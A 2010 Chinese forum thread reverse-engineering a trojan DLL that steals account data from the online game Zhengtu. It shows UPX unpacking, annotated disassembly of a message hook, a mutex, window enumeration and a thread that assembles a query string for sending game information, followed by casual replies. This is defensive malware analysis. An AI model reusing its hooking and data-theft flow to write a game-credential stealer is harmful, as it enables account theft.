分析一个征途木马的DLL文件
本帖最后由 qiang 于 2010-7-16 11:06 编辑
文件: C:\program files上海巨人网络科技有限公司征途绿色版\data\ksuser.dll
大小: 12800 字节
修改时间: 2010年7月15日, 15:15:10
MD5: EA96A8D2897A77FA91A3890CFCAAA986
SHA1: E7BB56EFC9B648A4D0B5979A5BF0C6196B60F36B
先脱壳,一路按F8下去,到地址1000D92F返回到UPX壳起始点。注意 1000D917 处的 jmp short 跳到 1000D91A,落在下一条指令(1000D919 处 FF 8B …)的第二个字节,所以紧接着列出的 1000D919、1000D91F 两行只是反汇编器线性反汇编错位的结果,并不是实际执行的指令。
1000D911 p> 66:8BC0 mov ax, ax
1000D914 53 push ebx
1000D915 60 pushad
1000D916 9C pushfd
1000D917 EB 01 jmp short 1000D91A
1000D919 FF8B C0B90200 dec dword ptr
1000D91F 2300 and eax, dword ptr
1000D921 E8 0A000000 call 1000D930
1000D926 90 nop
1000D927 9D popfd
1000D928 61 popad
1000D929 5B pop ebx
1000D92A 68 E0FC0000 push 0FCE0
1000D92F C3 retn
1000D927 9D popfd
1000D928 61 popad
1000D929 5B pop ebx
1000D92A 68 40D70010 push 1000D740
1000D92F C3 retn //返回到UPX壳起始点
UPX壳脱掉,来到入口点(即 DllMain:`cmp dword ptr [esp+8], 1` 判断 fdwReason 是否为 DLL_PROCESS_ATTACH,`retn 0C` 对应 DllMain 的三个参数):
10004590 837C24 08 01 cmp dword ptr , 1
10004595 75 0E jnz short 100045A5
10004597 8B4424 04 mov eax, dword ptr
1000459B A3 D09C0010 mov dword ptr , eax
100045A0 E8 9BFEFFFF call 10004440 //call 1
100045A5 B8 01000000 mov eax, 1
100045AA C2 0C00 retn 0C
进入call 1:
10004440 /$ 81EC 24090000 sub esp, 924 ; (Initial CPU selection)
10004446 |. 8D8424 24010000 lea eax, dword ptr
1000444D |. 53 push ebx
1000444E |. 8B1D 6C500010 mov ebx, dword ptr ; kernel32.GetModuleFileNameA
10004454 |. 56 push esi
10004455 |. 68 00080000 push 800 ; /BufSize = 800 (2048.)
1000445A |. 50 push eax ; |PathBuffer
1000445B |. 6A 00 push 0 ; |hModule = NULL
1000445D |. FFD3 call ebx ; \GetModuleFileNameA//获取当前进程名全路径
1000445F |. 8D4C24 14 lea ecx, dword ptr
10004463 |. 8D9424 2C010000 lea edx, dword ptr
1000446A |. 51 push ecx
1000446B |. 52 push edx
1000446C |. E8 DFF5FFFF call 10003A50 //这个函数获得进程名
10004471 |. 8B35 B0500010 mov esi, dword ptr ; kernel32.lstrcmpiA
10004477 |. 83C4 08 add esp, 8
1000447A |. 8D4424 14 lea eax, dword ptr
1000447E |. 68 BC650010 push 100065BC ; /explorer.exe
10004483 |. 50 push eax ; |String1
10004484 |. FFD6 call esi ; \lstrcmpiA //explorer.exe和当前进程名比较
10004486 |. 85C0 test eax, eax
10004488 |. 0F85 A3000000 jnz 10004531 //不是explorer.exe跳到地址10004531,是就往下走
1000448E |. 57 push edi
1000448F |. E8 1CF9FFFF call Hookon //设置WH_GETMESSAGE类型的消息钩子
10004494 |. 8B0D B0650010 mov ecx, dword ptr
1000449A |. 8B15 B4650010 mov edx, dword ptr
100044A0 |. A1 B8650010 mov eax, dword ptr
100044A5 |. 894C24 0C mov dword ptr , ecx
100044A9 |. 895424 10 mov dword ptr , edx
100044AD |. 894424 14 mov dword ptr , eax
100044B1 |. E8 AAF6FFFF call 10003B60
100044B6 |. 68 A0650010 push 100065A0 ; /ztcztsjasdfgh
100044BB |. 6A 00 push 0 ; |InitialOwner = FALSE
100044BD |. 6A 00 push 0 ; |pSecurity = NULL
100044BF |. FF15 84500010 call dword ptr ; \CreateMutexA
100044C5 |. E8 96F6FFFF call 10003B60
100044CA |. FF15 80500010 call dword ptr ; ntdll.RtlGetLastWin32Error
100044D0 |. 8D4C24 0C lea ecx, dword ptr
100044D4 |. 51 push ecx ; /MappingName
100044D5 |. 6A 00 push 0 ; |InheritHandle = FALSE
100044D7 |. 68 1F000F00 push 0F001F ; |Access = F001F
100044DC |. FF15 7C500010 call dword ptr ; \OpenFileMappingA
100044E2 |. 6A 00 push 0 ; /MapSize = 0
100044E4 |. 6A 00 push 0 ; |OffsetLow = 0
100044E6 |. 8BF0 mov esi, eax ; |
100044E8 |. 6A 00 push 0 ; |OffsetHigh = 0
100044EA |. 68 1F000F00 push 0F001F ; |AccessMode = F001F
100044EF |. 56 push esi ; |hMapObject
100044F0 |. FF15 78500010 call dword ptr ; \MapViewOfFile
100044F6 |. 8BF8 mov edi, eax
100044F8 |. A1 A8A10010 mov eax, dword ptr
100044FD |. 8D5424 2C lea edx, dword ptr
10004501 |. 68 04010000 push 104
10004506 |. 52 push edx
10004507 |. 50 push eax
10004508 |. FFD3 call ebx
1000450A |. 8B0F mov ecx, dword ptr
1000450C |. 6A 00 push 0 ; /lParam = 0
1000450E |. 6A 00 push 0 ; |wParam = 0
10004510 |. 6A 12 push 12 ; |Message = WM_QUIT
10004512 |. 51 push ecx ; |ThreadId
10004513 |. FF15 1C510010 call dword ptr ; \PostThreadMessageA
10004519 |. 57 push edi ; /BaseAddress
1000451A |. FF15 74500010 call dword ptr ; \UnmapViewOfFile
10004520 |. 56 push esi ; /hObject
10004521 |. FF15 A4500010 call dword ptr ; \CloseHandle
10004527 |. 5F pop edi
10004528 |. 5E pop esi
10004529 |. 5B pop ebx
1000452A |. 81C4 24090000 add esp, 924
10004530 |. C3 retn
10004531 |> 8D5424 14 lea edx, dword ptr
10004535 |. 68 94650010 push 10006594 ; zhengtu.dat
1000453A |. 52 push edx
1000453B |. FFD6 call esi ; kernel32.lstrcmpiA//当前进程和zhengtu.dat比较
1000453D |. 85C0 test eax, eax
1000453F |. 75 41 jnz short 10004582
10004541 |. E8 1AF6FFFF call 10003B60
10004546 |. 8D8424 2C010000 lea eax, dword ptr
1000454D |. 68 D08C0010 push 10008CD0
10004552 |. 50 push eax
10004553 |. E8 38F5FFFF call 10003A90
10004558 |. 83C4 08 add esp, 8
1000455B |. 6A 00 push 0 ; /lParam = 0
1000455D |. 68 C0430010 push 100043C0 ; |Callback = program_.100043C0
10004562 |. FF15 08510010 call dword ptr ; \EnumWindows
10004568 |. 6A 00 push 0 ; /pThreadId = NULL
1000456A |. 6A 00 push 0 ; |CreationFlags = 0
1000456C |. 6A 00 push 0 ; |pThreadParm = NULL
1000456E |. 68 00130010 push 10001300 ; |ThreadFunction = program_.10001300//线程函数
10004573 |. 6A 00 push 0 ; |StackSize = 0
10004575 |. 6A 00 push 0 ; |pSecurity = NULL
10004577 |. FF15 54500010 call dword ptr ; \CreateThread//创建一个线程
1000457D |. E8 DEF5FFFF call 10003B60
10004582 |> 5E pop esi
10004583 |. 5B pop ebx
10004584 |. 81C4 24090000 add esp, 924
1000458A \. C3 retn
线程函数(CreateThread 传入的 ThreadFunction = 10001300):
10001300 . 55 push ebp
10001301 . 8B2D B4500010 mov ebp, dword ptr ; kernel32.lstrcatA
10001307 . 56 push esi
10001308 . 8B35 B8500010 mov esi, dword ptr ; kernel32.lstrcpyA
1000130E . 57 push edi
1000130F . 8B3D BC500010 mov edi, dword ptr ; kernel32.lstrcmpA
10001315 > 68 10270000 push 2710 ; /Timeout = 10000. ms
1000131A . FF15 C0500010 call dword ptr ; \Sleep
10001320 . A1 DC650010 mov eax, dword ptr
10001325 . 85C0 test eax, eax
10001327 .^ 74 EC je short 10001315
10001329 . A0 BC8C0010 mov al, byte ptr
1000132E . 84C0 test al, al
10001330 .^ 74 E3 je short 10001315
10001332 . E8 29280000 call <NNULL>
10001337 . E8 44020000 call 10001580 ; // call 2函数获取游戏信息,并发送
1000133C . 85C0 test eax, eax
进入call 2:
10001580 /$ B8 10110000 mov eax, 1110
10001585 |. E8 76300000 call 10004600
1000158A |. 53 push ebx
1000158B |. 55 push ebp
1000158C |. 56 push esi
1000158D |. 33DB xor ebx, ebx
1000158F |. 57 push edi
10001590 |. 891D E4650010 mov dword ptr , ebx
10001596 |. 891D E0650010 mov dword ptr , ebx
1000159C |. E8 BF250000 call <NNULL>
100015A1 |. 33C0 xor eax, eax
100015A3 |. 8D4C24 10 lea ecx, dword ptr
100015A7 |. 894424 10 mov dword ptr , eax
100015AB |. 51 push ecx
100015AC |. 894424 18 mov dword ptr , eax
100015B0 |. 894424 1C mov dword ptr , eax
100015B4 |. 894424 20 mov dword ptr , eax
100015B8 |. FF15 A8500010 call dword ptr ; [GetTickCount
100015BE |. 50 push eax
100015BF |. E8 3C1C0000 call 10003200
100015C4 |. 8B2D B8500010 mov ebp, dword ptr ; kernel32.lstrcpyA
100015CA |. 83C4 08 add esp, 8
100015CD |. B9 40000000 mov ecx, 40
100015D2 |. 33C0 xor eax, eax
100015D4 |. 8D7C24 20 lea edi, dword ptr
100015D8 |. 8D5424 20 lea edx, dword ptr
100015DC |. 68 127F0010 push 10007F12 ; /String2 = ""
100015E1 |. 52 push edx ; |String1
100015E2 |. F3:AB rep stos dword ptr es: ; |
100015E4 |. FFD5 call ebp ; \lstrcpyA
100015E6 |. 8B35 B4500010 mov esi, dword ptr ; kernel32.lstrcatA
100015EC |. 8D4424 20 lea eax, dword ptr
100015F0 |. 68 98600010 push 10006098 ; /?u=\r\n
100015F5 |. 50 push eax ; |ConcatString
100015F6 |. FFD6 call esi ; \lstrcatA
100015F8 |. 8D4C24 20 lea ecx, dword ptr
100015FC |. 68 BC8C0010 push 10008CBC ; /StringToAdd = ""
10001601 |. 51 push ecx ; |ConcatString
10001602 |. FFD6 call esi ; \lstrcatA
10001604 |. 8D5424 20 lea edx, dword ptr
10001608 |. 68 94600010 push 10006094 ; /&t=?u=\r\n
1000160D |. 52 push edx ; |ConcatString
1000160E |. FFD6 call esi ; \lstrcatA
10001610 |. 8D4424 10 lea eax, dword ptr
10001614 |. 8D4C24 20 lea ecx, dword ptr
10001618 |. 50 push eax ; /StringToAdd
10001619 |. 51 push ecx ; |ConcatString
1000161A |. FFD6 call esi ; \lstrcatA
1000161C |. B9 00040000 mov ecx, 400
10001621 |. 33C0 xor eax, eax
10001623 |. 8DBC24 20010000 lea edi, dword ptr
1000162A |. 33D2 xor edx, edx
1000162C |. F3:AB rep stos dword ptr es:
1000162E |. 8915 A88C0010 mov dword ptr , edx
10001634 |. A3 10890010 mov dword ptr , eax
10001639 |. 8915 AC8C0010 mov dword ptr , edx
1000163F |. A3 14890010 mov dword ptr , eax
10001644 |. 33C9 xor ecx, ecx
10001646 |. 8915 B08C0010 mov dword ptr , edx
1000164C |. A3 18890010 mov dword ptr , eax
10001651 |. 890D AC870010 mov dword ptr , ecx
10001657 |. 8915 B48C0010 mov dword ptr , edx
1000165D |. A3 1C890010 mov dword ptr , eax
10001662 |. 890D B0870010 mov dword ptr , ecx
10001668 |. 891D E0650010 mov dword ptr , ebx
1000166E |. 8915 B88C0010 mov dword ptr , edx
10001674 |. A3 20890010 mov dword ptr , eax
10001679 |. 66:890D B487001>mov word ptr , cx
10001680 |. E8 DB240000 call <NNULL>
10001685 |. 8D9424 20010000 lea edx, dword ptr
1000168C |. 8D4424 20 lea eax, dword ptr
10001690 |. 52 push edx
10001691 |. 50 push eax
10001692 |. E8 C9FDFFFF call 10001460 ; 发信函数
只有一个DLL文件,分析了其大体流程,还请大家多多建议和指教。
解压密码ggsafe ...打我PG我不乖...啊 继续努力。。
关键位置还没详细分析 怎么分析的啊,期待楼主分析教程! LZ好WS的。。。 回复 5# xxz
请教WS是何意? 回复 xxz
请教WS是何意?
猥琐 同上解~~:lol 水平有限,。,不太懂 {:3_99:}
多谢大大地文章。。。 本帖最后由 bianfeng 于 2010-7-17 15:31 编辑
PLMM 基本上没分析 只是把反汇编工具的代码摆上来而已 看看bianfeng大侠的木马分析 本帖最后由 qiang 于 2010-7-19 17:48 编辑
回复 8# xxz
你太有才了,这都能想到。兄台回复太WS了。 本帖最后由 qiang 于 2010-7-19 18:01 编辑
回复 12# electric009
这个是一个DLL文件,有些地方分析还需要完善分析。 回复 13# qiang
兄台也不是一样WS?? 彼此彼此~~:lol